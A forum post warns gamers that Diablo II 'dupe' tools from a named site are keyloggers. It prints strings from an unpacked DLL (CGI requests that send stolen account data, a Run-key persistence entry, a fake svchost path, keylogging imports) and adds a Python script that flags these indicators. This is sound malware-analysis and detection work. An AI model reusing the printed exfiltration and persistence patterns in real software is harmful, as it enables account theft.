Sigh.
Ok, noobs. The site www.d2gamehacks.com has nothing *but* keylogging apps on it.
If any of you had any amount of common sense, you would *hex edit* these programs before running them. Or, with even more common sense, you would not download any "program" you see with the word dupe in it AT ALL.
But if you don't, then you would see that the file anti-detect.dll [as found in one file from that site, I believe the dupe app] is packed with UPX. After unpacking, a simple hex edit reveals the following:
GET /hello.cgi?account=new3&logs=heyey HTTP/1.0.HOST: d2gamehacks.com...64.202.163.7.... HTTP/1.0.HOST: d2gamehacks.com.....&logs=RUNNING!.. <-- CGI script that receives the stolen data, i.e. account/password/CD keys, etc.
GET /cgi/hello.cgi?account=.svchost.C:\Windows\svchost.exe..Software\Microsoft\Windows\CurrentVersion\Run...CVTmod.exe..c:\Windows\svchost.exe. <-- name of the trojan is CVTmod.exe; it also uses svchost.exe as a disguise to look like a legit file, but the real svchost lives in system32, not $windir.
.DIABLO ACTIVE!..Diablo II...Preferred Realm.Last BNet...Software\Blizzard Entertainment\Diablo II...JUSTTOCHECK.%2f.%22.%25.%27.%3a.%7d.%7b.%5d.%5b.%29.%28.%23.%21.%24.%26.%5c.%7c.%2a.%3e.%3c.%3b.&logs=..&realm=.. @....... <-- self-explanatory.
Various API calls include:
GetCurrentProcess...UnhandledExceptionFilter..GetModuleFileNameA..FreeEnvironmentStringsA...FreeEnvironmentStringsW...WideCharToMultiByte...GetEnvironmentStrings...GetEnvironmentStringsW..SetHandleCount..
RegOpenKeyExA...RegSetValueExA..RegCloseKey...RegQueryValueExA..GetPixel..GetForegroundWindow
These are various registry functions among other things. They can extract your last account entered, realm, install path and plenty of other things you don't want people knowing. Also,
GetAsyncKeyState..
Ok people. This function has only one use. Keylogging. Nothing else. If you see this and still willingly open this program, you are a total noob moron.
GetPixel and the other API calls are used to tell when the mouse hovers over the Battle.net connect button, at which point the keylogger would activate to effectively steal your noob ass's account and password.
Not to mention the whole 'heart beat packet' explanation for the dupe method on the page makes no sense whatsoever; there are a gazillion warning signs here. Don't be a noob. There are *no* public dupe "programs".
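For anyone who wants to do the same check without eyeballing a hex dump, here is an added example (my own code, not anything from that site or this post) that pulls printable strings out of a file the way `strings` does and flags the indicators listed above: the UPX section markers, the keylogging/registry/window imports, the CurrentVersion\Run persistence key, a CGI URL with account=/logs= parameters, and a svchost.exe sitting in the Windows directory instead of system32. The SAMPLE bytes are constructed to mimic the dump in this post and are not a real binary.

```python
import re

# Imports called out in the post, with why each one matters (assumed mapping).
API_INDICATORS = {
    "GetAsyncKeyState": "polls key state: keylogging",
    "GetForegroundWindow": "tracks the active window",
    "GetPixel": "samples screen pixels (UI-state trigger)",
    "RegSetValueExA": "writes registry values (persistence)",
    "RegQueryValueExA": "reads registry values (account/realm harvesting)",
}
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
EXFIL_RE = re.compile(r"GET (/\S*\.cgi\?\S*)")            # CGI URL with a query string
FAKE_SVCHOST_RE = re.compile(r"[A-Za-z]:\\Windows\\svchost\.exe", re.IGNORECASE)
STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")                # printable ASCII runs of 4+ bytes

SAMPLE = (  # constructed sample, mimics the post's string dump
    b"MZ\x90\x00\x00\x00\x00\x00UPX0\x00\x00\x00\x00UPX1\x00\x00"
    b"GetAsyncKeyState\x00GetForegroundWindow\x00GetPixel\x00"
    b"RegOpenKeyExA\x00RegSetValueExA\x00RegQueryValueExA\x00"
    b"Software\\Microsoft\\Windows\\CurrentVersion\\Run\x00CVTmod.exe\x00"
    b"c:\\Windows\\svchost.exe\x00"
    b"GET /cgi/hello.cgi?account=new3&logs=heyey HTTP/1.0\x00"
    b"Software\\Blizzard Entertainment\\Diablo II\x00"
)

def printable_strings(data: bytes) -> list:
    """Minimal `strings`: every run of 4+ printable ASCII bytes."""
    return [m.group().decode("ascii") for m in STRING_RE.finditer(data)]

def triage(data: bytes) -> dict:
    """Static triage of a (preferably already unpacked) file's bytes."""
    joined = "\n".join(printable_strings(data))
    apis = {name: why for name, why in API_INDICATORS.items() if name in joined}
    report = {
        "packed_upx": b"UPX!" in data or b"UPX0" in data,  # UPX section/signature markers
        "apis": apis,
        "run_key_persistence": RUN_KEY in joined,
        "exfil_urls": EXFIL_RE.findall(joined),
        "fake_svchost": bool(FAKE_SVCHOST_RE.search(joined)),
    }
    # Keystroke polling plus a way to ship or persist the data is the stealer pattern.
    stealer = "GetAsyncKeyState" in apis and (report["exfil_urls"] or report["run_key_persistence"])
    report["verdict"] = "likely keylogger/stealer" if stealer else "no stealer pattern found"
    return report

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

Run it on the unpacked file (`triage(open(path, "rb").read())`); on a still-packed UPX file only `packed_upx` will fire, since the strings are compressed until you unpack it.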